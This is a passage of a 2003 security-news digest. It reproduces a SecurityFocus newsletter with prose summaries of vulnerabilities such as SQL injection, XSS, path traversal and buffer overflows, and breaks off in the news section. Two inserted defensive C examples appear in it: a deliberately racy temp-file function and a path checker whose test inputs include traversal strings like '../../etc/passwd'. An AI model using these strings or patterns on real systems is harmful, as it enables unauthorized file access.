[NEWS:] GN SecNews Vol #1
Vijay Kumar
Jan 25, 2003 22:42 PST
GN SecNews Vol #1
-----------------
News Article Type: Weekly
Author: vijay (vijay-@users.sourceforge.net)
Date: Sat Jan 25 19:46:05 IST 2003
Please send in your comments and suggestions for improvement.
Disclaimer: This is a compilation of Security News Articles/Advisories from various GNU/Linux Providers, Developers and Users. The Author(s) of this article make no warranties of any kind whatsoever with respect to the information contained from the sources. The information given here is as is from the source with the PGP signature if available.
===============================================================================
Contents
========
SecurityFocus Newsletter #180
SuSE Security Announcement
iDEFENSE Security Advisory 01.21.03
===============================================================================
SecurityFocus Newsletter #180
-----------------------------
-------------------------------------------------------------------------------
I. FRONT AND CENTER
1. Exchange 2000 in the Enterprise: Tips and Tricks Part Two
2. The Curmudgeon's Crystal Ball: Security Predictions for 2003
3. Open Source Honeypots: Learning with Honeyd
4. SecurityFocus DPP Program
5. InfoSec World Conference and Expo/2003 (March 10-12, 2003, Orlando, FL)
II. BUGTRAQ SUMMARY
1. Xynph FTP Server Relative Path Directory Traversal Vulnerability
2. BitMover BitKeeper Daemon Mode Remote Command Execution...
3. BitMover BitKeeper Local Temporary File Race Condition...
4. BitMover BitKeeper Local Insecure Temporary File Permissions...
5. YABB SE Reminder.PHP SQL Injection Vulnerability
6. Stunnel Unspecified SIGCHLD Signal Handler Vulnerability
7. phpPass AccessControl.PHP SQL Injection Vulnerability
8. W-Agora Remote File Disclosure Vulnerability
9. mpg123 Invalid MP3 Header Memory Corruption Vulnerability
10. Cyboards PHP Lite Remote File Include Vulnerability
11. Cyboards PHP Lite Multiple Cross Site Scripting Vulnerabilities
12. Solaris UUCP Local Buffer Overflow Vulnerability
13. Symantec Norton Internet Security ICMP Packet Flood Denial Of...
14. Geeklog Profiles.PHP Multiple Cross-Site Scripting...
15. Geeklog Users.PHP Cross-Site Scripting Vulnerability
16. Geeklog Comment.PHP Cross-Site Scripting Vulnerability
17. Geeklog Homepage User Field HTML Injection Vulnerability
18. vAuthenticate Remote SQL Injection Vulnerability
19. vSignup Remote SQL Injection Vulnerability
20. Psunami Bulletin Board Psunami.CGI Remote Command Execution...
21. D-Link DWL-900AP+ Firmware Upgrade Configuration Reset...
22. HTML Forms Generation And Validation Forms.PHP HTML Injection...
23. Trend Micro OfficeScan CGI Directory Insufficient Permissions...
24. Trend Micro Virus Control System Denial Of Service Vulnerability
25. Trend Micro Virus Control System Information Disclosure...
III. SECURITYFOCUS NEWS ARTICLES
1. Rumsfeld orders .mil Web lockdown
2. MS seeks malware, bust phones after SPV security crack
3. Discarded computer hard drives prove a trove of personal info
4. BBC in ironic virus infection
IV. SECURITYFOCUS TOP 6 TOOLS
1. ForceSQL v2.0
2. SMAC v1.0
3. Active@ File Recovery v2.0
4. NBTdeputy v1.0
5. APD v1
6. mysql_auth v0.5
V. SECURITYJOBS LIST SUMMARY
1. Senior Identity Manager - Cleveland, Ohio (Thread)
2. Policy, Procedure, and Compliance Senior Manager - Cleveland...
3. Vulnerability Manager (Thread)
4. Senior Enterprise Security Manager position in PA (Thread)
5. Security Engineer (Thread)
6. WANTED - Senior Sales Exec - New York (Tri-State Area) (Thread)
7. Vice President of Business Development (Thread)
8. Security System Engineer - Baltimore/Washington DC (Thread)
9. Security Engineer -- San Diego (Thread)
10. Senior Security Engineer - Baltimore/Washington DC (Thread)
11. Seeking information security opportunity in - CA/ LA (CISSP)...
12. Lead Business Development/Security Consultant(s) - UK (Thread)
13. Seeking Information Security employment (Thread)
14. Senior Federal Territory Manager (Thread)
15. Information Security Analyst (Thread)
16. IDS Signature Engineer needed now! (revised) (Thread)
17. IDS Signature Engineer needed now! (Thread)
18. Security Position with Bristol-Myers Squibb-Hopewell-NJ (Thread)
19. Seeking internship or entry-level position (Thread)
20. Looking for a security based role (no experience) (Thread)
21. @stake Employment in Seattle (Thread)
22. Looking for security job opportunity in Northern...
VI. INCIDENTS LIST SUMMARY
1. Hacked web server (Thread)
2. Virus? Trojan? (Thread)
VII. VULN-DEV RESEARCH LIST SUMMARY
1. NO NEW POSTS FOR THE WEEK ENDING 01.17.03
VIII. MICROSOFT FOCUS LIST SUMMARY
1. AD replication over WAN (Thread)
2. SecurityFocus Microsoft Newsletter #120 (Thread)
3. AD replication (Thread)
4. Understanding Event Details in Windows NT (Thread)
5. FW: AD replication over WAN (Thread)
IX. SUN FOCUS LIST SUMMARY
1. NO NEW POSTS FOR THE WEEK ENDING 01.17.03
X. LINUX FOCUS LIST SUMMARY
1. How to build CD with chkrootkit on it? (Thread)
XI. SPONSOR INFORMATION
I. FRONT AND CENTER
-------------------
1. Exchange 2000 in the Enterprise: Tips and Tricks Part Two
By Tim Mullen
This is the second installment in a two-part series on securing Exchange
2000 in the enterprise. In the first part, we finished up building a
messaging infrastructure that handled many of the issues mail
administrators must contend with. This segment will address the security
ramifications of publishing mail content to the Internet via Outlook Web
Access.
http://online.securityfocus.com/infocus/1658
2. The Curmudgeon's Crystal Ball: Security Predictions for 2003
By Richard Forno
As we ring in the new year, it's in with the new and out with the old. Or
is it? Our fearless forecaster thinks not.
http://online.securityfocus.com/columnists/135
3. Open Source Honeypots: Learning with Honeyd
By Lance Spitzner
Honeypots are an exciting new technology. They allow us to turn the tables
on the bad guys; we can take the initiative. In the past several years
there has been growing interest in exactly what this technology is and how
it works. The purpose of this paper is to introduce you to honeypots and
demonstrate their capabilities. We will begin by discussing what a
honeypot is and how it works, then go into detail using the OpenSource
solution Honeyd.
http://online.securityfocus.com/infocus/1659
4. SecurityFocus DPP Program
Attention Universities!! Sign-up now for preferred pricing on the only
global early-warning system for cyber attacks - SecurityFocus DeepSight
Threat Management System.
Click here for more information:
http://www.securityfocus.com/corporate/products/dpsection.shtml
5. InfoSec World Conference and Expo/2003 (March 10-12, 2003, Orlando, FL)
Optional Workshops March 8, 9, 12, 13, & 14 Vendor Expo March 10 & 11
Solutions to today's security concerns; hands-on experts; blockbuster
vendor expo; the CISO Executive Summit; invaluable networking
opportunities. InfoSec World has it all!
Go to: http://www.misti.com/10/os03nl37inf.html
II. BUGTRAQ SUMMARY
-------------------
1. Xynph FTP Server Relative Path Directory Traversal Vulnerability
BugTraq ID: 6587
Remote: Yes
Date Published: Jan 11 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6587
Summary:
Xynph FTP Server is a shareware FTP server available for Microsoft Windows
operating systems.
A problem in Xynph FTP Server may allow a remote user to gain access to
unauthorized resources.
A problem with the handling of input has been reported in Xynph FTP
Server. Under some circumstances, it may be possible for a remote user to
escape the FTP root directory using relative path notation. This could
allow unauthorized access to systems using the vulnerable software.
It should be noted that this problem may allow an attacker to download
arbitrary files on the vulnerable system. Additionally, the attacker
would be able to access any files on the system to which the FTP server
has access rights, which may be run with SYSTEM privileges in some
configurations.
2. BitMover BitKeeper Daemon Mode Remote Command Execution Vulnerability
BugTraq ID: 6588
Remote: Yes
Date Published: Jan 11 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6588
Summary:
BitKeeper is a source code management system by BitMover. It is available
for Unix, Linux, and Microsoft Windows operating systems.
A problem with BitKeeper may make remote command execution possible.
It has been reported that BitKeeper is vulnerable to an input validation
bug. When the software is run in daemon mode, it starts a service with an
interface that can be connected to via HTTP. By sending specially crafted
input to the service, it is possible to execute arbitrary commands.
The program does not properly filter single quotes. As a result, commands
contained between quotes will be executed on the host running the
vulnerable software. Any commands executed between quotes will be
executed with the privileges of the BitKeeper daemon process.
3. BitMover BitKeeper Local Temporary File Race Condition Vulnerability
BugTraq ID: 6589
Remote: No
Date Published: Jan 12 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6589
Summary:
BitKeeper is a source code management system by BitMover. It is available
for Unix, Linux, and Microsoft Windows operating systems.
A problem with BitKeeper may make local symbolic link attacks possible.
It has been reported that BitKeeper is vulnerable to a race condition
error. Under some circumstances, BitKeeper creates files in the temporary
directory. However, it may be possible to create a symbolic link in a
crucial point of program execution that would result in the overwriting of
files at the end of the link.
The program does not properly open the temporary file. Rather than
performing the check and opening the file all in one function, the program
first checks, then in a separate function opens the file. This creates a
window of attack that could result in the overwriting of files that are
write-accessible to the BitKeeper process.
4. BitMover BitKeeper Local Insecure Temporary File Permissions Vulnerability
BugTraq ID: 6590
Remote: No
Date Published: Jan 12 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6590
Summary:
BitKeeper is a source code management system by BitMover. It is available
for Unix, Linux, and Microsoft Windows operating systems.
A problem with BitKeeper may make the destruction or injection of
information possible.
It has been reported that BitKeeper insecurely creates temporary files.
Under some circumstances, BitKeeper creates files in the temporary
directory. However, these files are created with world-writable
permissions, which may allow the removal of these files, or injection of
data into them.
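The check-then-open pattern and the world-writable mode described in items 3 and 4, next to a creation routine that closes both, as an added example (not BitKeeper code). All function names, the scratch directory and the file names are hypothetical, and the sample files are constructed at run time.

```c
/* Added example: racy vs. race-free temp-file creation on POSIX.
 * Function and file names are hypothetical, not BitKeeper's. */
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Pattern from item 3: existence check, then open, as two steps.
 * Between lstat() and open() another local user can plant a symlink;
 * open() without O_EXCL follows it and truncates the link target.
 * Mode 0666 leaves the file writable by everyone unless the umask
 * happens to mask it (the permission problem in item 4). */
int open_tmp_racy(const char *path)
{
    struct stat st;
    if (lstat(path, &st) == 0) {
        errno = EEXIST;
        return -1;
    }
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
}

/* Check and create in one system call. With O_CREAT|O_EXCL, open()
 * fails with EEXIST if the name exists in any form, symlinks included,
 * so there is no window. fchmod() pins owner-only access. */
int open_tmp_safe(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0)
        return -1;
    if (fchmod(fd, 0600) != 0) {
        int saved = errno;
        close(fd);
        unlink(path);
        errno = saved;
        return -1;
    }
    return fd;
}

/* Private scratch directory for the demos (mkdtemp creates it 0700). */
static int make_scratch(char *dir, size_t n)
{
    const char *base = getenv("TMPDIR");
    snprintf(dir, n, "%s/tmpdemo.XXXXXX", base ? base : "/tmp");
    return mkdtemp(dir) != NULL;
}

/* Plant a symlink where the temp file would go, then confirm the safe
 * open refuses it and the link target is untouched. 1 = as expected. */
int demo_symlink_refused(void)
{
    char dir[256], victim[300], tmp[300], buf[8] = {0};
    int ok = 0, fd, r, refused;

    if (!make_scratch(dir, sizeof dir))
        return 0;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(tmp, sizeof tmp, "%s/work.tmp", dir);

    fd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd >= 0) {
        int wrote = (write(fd, "keep", 4) == 4);
        close(fd);
        if (wrote && symlink(victim, tmp) == 0) {
            r = open_tmp_safe(tmp);
            refused = (r < 0 && errno == EEXIST);
            if (r >= 0)
                close(r);
            fd = open(victim, O_RDONLY);
            if (fd >= 0) {
                ssize_t n = read(fd, buf, sizeof buf - 1);
                close(fd);
                ok = refused && n == 4 && memcmp(buf, "keep", 4) == 0;
            }
        }
    }
    unlink(tmp);
    unlink(victim);
    rmdir(dir);
    return ok;
}

/* Create a fresh file with the given opener under umask 0 (nothing
 * masked) and return its permission bits, or -1 on failure. */
int created_mode(int (*opener)(const char *))
{
    char dir[256], tmp[300];
    struct stat st;
    int mode = -1, fd;
    mode_t old = umask(0);

    if (make_scratch(dir, sizeof dir)) {
        snprintf(tmp, sizeof tmp, "%s/work.tmp", dir);
        fd = opener(tmp);
        if (fd >= 0) {
            if (fstat(fd, &st) == 0)
                mode = (int)(st.st_mode & 0777);
            close(fd);
            unlink(tmp);
        }
        rmdir(dir);
    }
    umask(old);
    return mode;
}

int main(void)
{
    printf("symlink refused by safe open: %d\n", demo_symlink_refused());
    printf("mode via racy open: %o\n", (unsigned)created_mode(open_tmp_racy));
    printf("mode via safe open: %o\n", (unsigned)created_mode(open_tmp_safe));
    return 0;
}
```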
5. YABB SE Reminder.PHP SQL Injection Vulnerability
BugTraq ID: 6591
Remote: Yes
Date Published: Jan 12 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6591
Summary:
YaBB SE is a freely available, open source port of Yet Another Bulletin
Board (YaBB). It is available for Unix, Linux, and Microsoft Operating
Systems.
A problem with YaBB SE could make it possible for a remote user to launch SQL
injection attacks.
It has been reported that a problem exists in the Reminder.php script
distributed as part of YaBB SE. Due to insufficient sanitizing of input,
it is possible for a remote user to inject arbitrary SQL into the database
used by YaBB SE that could be used to reset or change the password of a
user.
This problem may allow a remote user to change the password of the
administrative user of an instance of YaBB SE. It may also allow a remote
user to gain other information from SQL databases used to backend YaBB SE.
6. Stunnel Unspecified SIGCHLD Signal Handler Vulnerability
BugTraq ID: 6592
Remote: No
Date Published: Jan 13 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6592
Summary:
Stunnel is a freely available, open source cryptography wrapper. It is
designed to wrap arbitrary protocols that may or may not support
cryptography. It is maintained by the Stunnel project.
A vulnerability has been reported for Stunnel. The vulnerability exists in
the SIGCHLD signal handling routine. Reportedly, some functions in the
signal handler are used in an unsafe manner.
Precise technical details of this vulnerability are currently unknown.
This BID will be updated as further information is available.
This vulnerability has been reported to affect Stunnel versions prior to
4.04.
7. phpPass AccessControl.PHP SQL Injection Vulnerability
BugTraq ID: 6594
Remote: Yes
Date Published: Jan 13 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6594
Summary:
phpPass is a system that allows restrictions to web pages. It is
implemented in PHP and is available for a variety of platforms.
A problem with phpPass may allow an attacker to launch a SQL injection
attack.
The vulnerability exists in the accesscontrol.php script included with
phpPass. Due to insufficient sanitization of user-supplied input, it is
possible for a remote user to inject arbitrary SQL into the database used
by a vulnerable site. This may allow an attacker to view pages that would
normally be restricted.
SQL injection attacks may also potentially be used to exploit latent
vulnerabilities in the underlying database implementation.
This vulnerability was reported for phpPass 2. It is not known whether
other versions are affected.
8. W-Agora Remote File Disclosure Vulnerability
BugTraq ID: 6595
Remote: Yes
Date Published: Jan 13 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6595
Summary:
W-Agora is a freely available, open source PHP forum software package. It
is available for Unix and Linux systems.
A file disclosure vulnerability has been reported for W-Agora. Reportedly,
some scripts included with W-Agora do not adequately sanitize some
user-supplied input. The vulnerability was reported to exist in the
index.php and modules.php script files.
An attacker can construct a URL consisting of dot-dot-slash (../)
character sequences to obtain access to files outside of the document
root. It should be noted that only files accessible by the web server will
be disclosed to the attacker.
Exploitation of this vulnerability may lead to disclosure of sensitive
information that may be useful in mounting further attacks on the host
system.
This vulnerability affects W-Agora 4.1.5.
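A containment check for the relative-path escapes described in item 1 (Xynph FTP Server) and item 8 (W-Agora), as an added example that is not code from either product. The function name, the root path and the sample requests are hypothetical; it assumes the request has already been URL-decoded, and it resolves the path lexically only, so symlinks inside the root need a separate check.

```c
/* Added example: lexical containment of a client-supplied path under a
 * served root. Names and sample values are hypothetical. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_DEPTH 64

/* Treat both separators alike, since the request may target Windows. */
static int is_sep(char c) { return c == '/' || c == '\\'; }

/* Resolve `req` relative to `root` (no trailing slash assumed).
 * "." and empty components are dropped, ".." pops one component.
 * Returns 0 and writes the joined path to `out`, or -1 if the request
 * would climb above the root, names a drive or stream (':'), is too
 * deep, or does not fit in `out`. */
int resolve_under_root(const char *root, const char *req,
                       char *out, size_t outlen)
{
    const char *seg[MAX_DEPTH];
    size_t len[MAX_DEPTH];
    int depth = 0;
    const char *p = req;

    while (*p) {
        while (is_sep(*p))
            p++;
        const char *start = p;
        while (*p && !is_sep(*p))
            p++;
        size_t n = (size_t)(p - start);

        if (n == 0 || (n == 1 && start[0] == '.'))
            continue;                       /* nothing to add */
        if (n == 2 && start[0] == '.' && start[1] == '.') {
            if (depth == 0)
                return -1;                  /* would leave the root */
            depth--;
            continue;
        }
        if (memchr(start, ':', n))
            return -1;                      /* drive letter or stream */
        if (depth == MAX_DEPTH)
            return -1;
        seg[depth] = start;
        len[depth] = n;
        depth++;
    }

    size_t used = strlen(root);
    if (used >= outlen)
        return -1;
    memcpy(out, root, used);
    for (int i = 0; i < depth; i++) {
        if (used + 1 + len[i] >= outlen)
            return -1;                      /* no room for '/', name, NUL */
        out[used++] = '/';
        memcpy(out + used, seg[i], len[i]);
        used += len[i];
    }
    out[used] = '\0';
    return 0;
}

int main(void)
{
    /* Constructed sample requests, not taken from any advisory. */
    const char *reqs[] = {
        "pub/readme.txt", "pub/../readme.txt", "./pub//./file",
        "../../etc/passwd", "pub/../../secret", "..\\..\\boot.ini",
        "C:\\boot.ini",
    };
    char out[128];

    for (size_t i = 0; i < sizeof reqs / sizeof reqs[0]; i++) {
        if (resolve_under_root("/srv/ftp", reqs[i], out, sizeof out) == 0)
            printf("%-20s -> %s\n", reqs[i], out);
        else
            printf("%-20s -> rejected\n", reqs[i]);
    }
    return 0;
}
```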
9. mpg123 Invalid MP3 Header Memory Corruption Vulnerability
BugTraq ID: 6593
Remote: Yes
Date Published: Jan 13 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6593
Summary:
mpg123 is an MPEG audio player for Linux variant operating systems.
A memory corruption vulnerability has been reported for mpg123 that may
result in code execution.
The vulnerability exists when mpg123 is used to play certain MP3 files.
Specifically, when playing MP3 files with malformed or overly large
headers, it may be possible to cause mpg123 to execute malicious
attacker-supplied code.
The file common.c defines MAX_INPUT_FRAMESIZE to a value of 1920 bytes. An
attacker can exploit this vulnerability by creating a malicious MP3 file
that contains headers consisting of greater than 1920 bytes. When mpg123
is used to play this corrupted MP3 file, it will trigger the buffer
overflow condition. Any attacker supplied code will be executed with the
privileges of the mpg123 process.
This vulnerability has been reported to affect mpg123pre0.59s.
10. Cyboards PHP Lite Remote File Include Vulnerability
BugTraq ID: 6597
Remote: Yes
Date Published: Jan 13 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6597
Summary:
A vulnerability has been discovered in Cyboards PHP Lite. Due to
insufficient sanitization of user-supplied variables by the
'default_header.php' and 'options_form.php' scripts, it is possible for a
remote attacker to include a malicious PHP file in a URL.
By placing a script on an attacker-controlled host and mimicking the name
and directory structure of the server, it is possible to cause a
vulnerable server to include the file.
It may be possible to exploit this issue to execute arbitrary commands
with the privileges of the target server.
11. Cyboards PHP Lite Multiple Cross Site Scripting Vulnerabilities
BugTraq ID: 6596
Remote: Yes
Date Published: Jan 13 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6596
Summary:
Multiple cross site scripting vulnerabilities have been discovered in
Cyboards PHP Lite. These issues occur due to insufficient validation of
user supplied values.
It is possible for a remote attacker to create a malicious link containing
script code that will be executed in the browser of a legitimate user. All
code will be executed within the context of the website running Cyboards
PHP Lite.
This issue affects the following PHP scripts:
include/default_header.php
include/options_form.php
adminopts/login_form.php
adminopts/include/ban_form.php
adminopts/include/board_form.php
adminopts/include/login_form.php
adminopts/include/vip_form.php
This issue could be exploited to steal a legitimate user's cookie-based
authentication credentials. Information gained in this manner could be
later used to hijack a legitimate user's web session.
12. Solaris UUCP Local Buffer Overflow Vulnerability
BugTraq ID: 6600
Remote: No
Date Published: Jan 13 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6600
Summary:
UUCP is the Unix-to-Unix Copy Protocol infrastructure, implemented with
numerous Unix and Unix clone operating systems.
A vulnerability has been discovered in the Solaris implementation of UUCP.
The problem is due to insufficient bounds checking of user-supplied
filenames. By passing excessive data as an argument for the '-s' command
line parameter it is possible to trigger a buffer overflow. By exploiting
this issue to overwrite sensitive locations in memory, it may be possible
for an attacker to execute arbitrary code.
As UUCP is installed setuid root this would result in the execution of
attacker-supplied commands with the privileges of the superuser.
13. Symantec Norton Internet Security ICMP Packet Flood Denial Of Service Vulnerability
BugTraq ID: 6598
Remote: Yes
Date Published: Jan 13 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6598
Summary:
Symantec Norton Internet Security is a suite of commercial security
utilities including Norton Personal Firewall and Norton Antivirus.
Symantec Norton Internet Security 2003 is reported to be prone to a denial
of service condition.
It is possible to trigger this condition by sending an excessive
(approximately 65500 or more) number of ICMP packets to a host running
Norton Internet Security. This may cause a denial of service and possible
system instability.
For this issue to be present, the software must be configured to allow
ICMP packets and the firewall must be enabled.
It is not known if earlier versions of the software are also affected by
this vulnerability.
14. Geeklog Profiles.PHP Multiple Cross-Site Scripting Vulnerabilities
BugTraq ID: 6601
Remote: Yes
Date Published: Jan 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6601
Summary:
Geeklog is freely available, open-source weblog software. It is written in
PHP and will run on most Unix and Linux variants, as well as Microsoft
Windows operating systems.
The Geeklog 'profiles.php' script is prone to multiple cross-site
scripting vulnerabilities.
This issue is due to insufficient sanitization of input submitted in URI
parameters. This input will be displayed in webpages generated by
Geeklog. As a result, an attacker may create a malicious link to a site
hosting Geeklog, which contains malicious HTML or script code.
When such a link is visited by an unsuspecting user, attacker-supplied
script code will be interpreted by their web client in the security
context of the site hosting Geeklog.
Exploitation of this issue may enable an attacker to steal cookie-based
authentication credentials from legitimate users of the software. Other
attacks are also possible.
15. Geeklog Users.PHP Cross-Site Scripting Vulnerability
BugTraq ID: 6602
Remote: Yes
Date Published: Jan 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6602
Summary:
Geeklog is freely available, open-source weblog software. It is written in
PHP and will run on most Unix and Linux variants, as well as Microsoft
Windows operating systems.
Geeklog is prone to a cross-site scripting vulnerability in the
'users.php' script.
This issue is due to insufficient sanitization of input submitted in URI
parameters. This input will be displayed in webpages generated by
Geeklog. As a result, an attacker may create a malicious link to a site
hosting Geeklog, which contains malicious HTML or script code.
When such a link is visited by an unsuspecting user, attacker-supplied
script code will be interpreted by their web client in the security
context of the site hosting Geeklog.
Exploitation of this issue may enable an attacker to steal cookie-based
authentication credentials from legitimate users of the software. Other
attacks are also possible.
16. Geeklog Comment.PHP Cross-Site Scripting Vulnerability
BugTraq ID: 6603
Remote: Yes
Date Published: Jan 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6603
Summary:
Geeklog is freely available, open-source weblog software. It is written in
PHP and will run on most Unix and Linux variants, as well as Microsoft
Windows operating systems.
Geeklog is prone to a cross-site scripting vulnerability in the
'comment.php' script.
This issue is due to insufficient sanitization of input submitted in URI
parameters. This input will be displayed in webpages generated by
Geeklog. As a result, an attacker may create a malicious link to a site
hosting Geeklog, which contains malicious HTML or script code.
When such a link is visited by an unsuspecting user, attacker-supplied
script code will be interpreted by their web client in the security
context of the site hosting Geeklog.
Exploitation of this issue may enable an attacker to steal cookie-based
authentication credentials from legitimate users of the software. Other
attacks are also possible.
17. Geeklog Homepage User Field HTML Injection Vulnerability
BugTraq ID: 6604
Remote: Yes
Date Published: Jan 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6604
Summary:
Geeklog is freely available, open-source weblog software. It is written in
PHP and will run on most Unix and Linux variants, as well as Microsoft
Windows operating systems.
Geeklog is prone to HTML injection attacks.
The user account 'Homepage' field is not sufficiently sanitized of HTML
and script code. As a result, a malicious user may inject malicious HTML
and script code into this field when editing their user information.
When the malicious user's account information is displayed to other web
users, the attacker-supplied code will be interpreted in their web client
in the security context of the site hosting the vulnerable software.
Exploitation of this issue may enable an attacker to steal cookie-based
authentication credentials from legitimate users of the software. Other
attacks are also possible.
18. vAuthenticate Remote SQL Injection Vulnerability
BugTraq ID: 6605
Remote: Yes
Date Published: Jan 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6605
Summary:
vAuthenticate is an authentication script that uses PHP and MySQL. It is
available for the Microsoft Windows, Linux, and Unix operating systems.
A vulnerability has been discovered in vAuthenticate. It has been reported
that the 'auth.php' fails to sufficiently sanitize user-supplied
variables, making various PHP files prone to SQL injection attacks. This
may make it possible for an unauthorized user to access protected documents.
The 'chgpwd.php' and 'admin/index.php' scripts are affected by this issue.
An attacker that is able to access protected web pages may gain sensitive
information that may aid in launching further attacks against a target
server.
SQL injection attacks may also potentially be used to exploit latent
vulnerabilities in the underlying database implementation.
This vulnerability was reported for vAuthenticate 2.8.
19. vSignup Remote SQL Injection Vulnerability
BugTraq ID: 6606
Remote: Yes
Date Published: Jan 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6606
Summary:
vAuthenticate is an authentication script that uses PHP and MySQL. It is
available for the Microsoft Windows, Linux, and Unix operating systems.
A vulnerability has been discovered in vSignup. It has been reported that
the 'auth.php' fails to sufficiently sanitize user-supplied variables,
making various PHP files prone to SQL injection attacks. This may make it
possible for an unauthorized user to access protected documents. The
'chgpwd.php' and 'admin/index.php' scripts are affected by this issue.
An attacker that is able to access protected web pages may gain sensitive
information that may aid in launching further attacks against a target
server.
SQL injection attacks may also potentially be used to exploit latent
vulnerabilities in the underlying database implementation.
This vulnerability was reported for vSignup 2.1.
20. Psunami Bulletin Board Psunami.CGI Remote Command Execution Vulnerability
BugTraq ID: 6607
Remote: Yes
Date Published: Jan 13 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6607
Summary:
Psunami is bulletin board software. It is implemented in Perl and is
available for Unix and Linux variants.
Psunami Bulletin Board is prone to a remote command execution
vulnerability. This issue is present in the 'psunami.cgi' script.
Psunami does not sufficiently sanitize shell metacharacters from query
strings. Input supplied via the 'topic' URI parameter will be passed to a
Perl open() call. As a result, it may be possible for a remote attacker
to execute arbitrary commands in the context of the webserver process.
A remote attacker may exploit this condition to gain local, interactive
access to the underlying host.
21. D-Link DWL-900AP+ Firmware Upgrade Configuration Reset Vulnerability
BugTraq ID: 6609
Remote: Yes
Date Published: Jan 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6609
Summary:
The DWL-900AP+ is a wireless access point manufactured by D-Link which is
capable of speeds up to 22Mbps. A vulnerability has been discovered in the
DWL-900AP+.
The D-Link AirPlus Access Point Manager is used for various administrative
tasks including firmware upgrades. It has been reported that upgrading the
DWL-900AP+ firmware with this software will cause all configuration
settings to be reset to factory defaults.
This poses a security risk, as an unknowing user may upgrade their
device and leave it accessible with a publicly known
administrator password.
22. HTML Forms Generation And Validation Forms.PHP HTML Injection Vulnerability
BugTraq ID: 6608
Remote: Yes
Date Published: Jan 14 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6608
Summary:
The HTML Forms Generation And Validation package is a freely available,
open source PHP package. It is written and maintained by Manuel Lemos.
A problem with HTML Forms Generation And Validation could make HTML
injection attacks possible.
It has been reported that the forms.php component of HTML Forms Generation
And Validation does not properly check input. Because of this, an
attacker could potentially launch HTML injection attacks indirectly via
form fields.
This may allow for malicious script code to be inadvertently executed in
the browser of a user who views pages which include attacker-supplied HTML
and script code.
23. Trend Micro OfficeScan CGI Directory Insufficient Permissions Vulnerability
BugTraq ID: 6616
Remote: Yes
Date Published: Jan 15 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6616
Summary:
Trend Micro OfficeScan is an enterprise-level centrally managed antivirus
solution.
A vulnerability has been reported for Trend Micro OfficeScan that may
allow attackers to access programs residing in the cgi directory of the
OfficeScan installation.
An attacker can exploit this vulnerability by making a request to any
programs in the 'cgi' directory via an HTTP request. Some of these programs,
such as the 'cgiChkMasterPwd.exe', allow an attacker to access
OfficeScan's pages with administrative access. This may allow an attacker
to modify or disable OfficeScan functionality.
24. Trend Micro Virus Control System Denial Of Service Vulnerability
BugTraq ID: 6617
Remote: Yes
Date Published: Jan 15 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6617
Summary:
Trend Micro Virus Control System (TVCS) is a Web based management system
that allows administrators to configure, monitor and maintain anti-virus
programs on a network.
A denial of service vulnerability has been reported for TVCS. The
vulnerability occurs when numerous requests for 'activesupport.exe' are
made.
An attacker can exploit this vulnerability by making a request for the
'/tvcs/activesupport.exe' service. This will result in the web server
failing to respond for a limited period of time. Subsequent requests will
ensure that the web server will fail to respond for an indefinite period
of time.
This vulnerability has been reported to affect older versions of Trend
Micro TVCS. The TVCS system has been replaced by TMCM (Trend Micro Control
Manager) which is reportedly not vulnerable to this issue.
25. Trend Micro Virus Control System Information Disclosure Vulnerability
BugTraq ID: 6618
Remote: Yes
Date Published: Jan 15 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/6618
Summary:
Trend Micro Virus Control System (TVCS) is a Web based management system
that allows administrators to configure, monitor and maintain anti-virus
programs on a network.
An information disclosure vulnerability has been reported for TVCS.
Reportedly, it is possible for an attacker to access the log files
generated by TVCS. The log files contain very sensitive information about
the system, including user names and passwords.
Any information obtained in this manner may be used by an attacker to
launch further destructive attacks against a system.
This vulnerability has been reported to affect older versions of Trend
Micro TVCS. The TVCS system has been replaced by TMCM (Trend Micro Control
Manager) which is reportedly not vulnerable to this issue.
III. SECURITYFOCUS NEWS AND COMMENTARY
------------------------------------------
1. Rumsfeld orders .mil Web lockdown
By Kevin Poulsen
The defense secretary cites an al Qaeda training manual in ordering the
armed services to strip official Web sites of information that could aid
the enemy.
http://online.securityfocus.com/news/2062
2. MS seeks malware, bust phones after SPV security crack
By John Lettice, The Register
A quite bizarre CNET report reveals that Microsoft's Security Response
Center began investigations into the circumvention of security on the SPV
smartphone on Tuesday, searching - so says CNET, anyway - for reports of
rogue programs on the network and damaged phones.
http://online.securityfocus.com/news/2059
3. Discarded computer hard drives prove a trove of personal info
By Justin Pope, The Associated Press
So, you think you cleaned all your personal files from that old computer
you got rid of? Two graduate students at the Massachusetts Institute of
Technology suggest you think again.
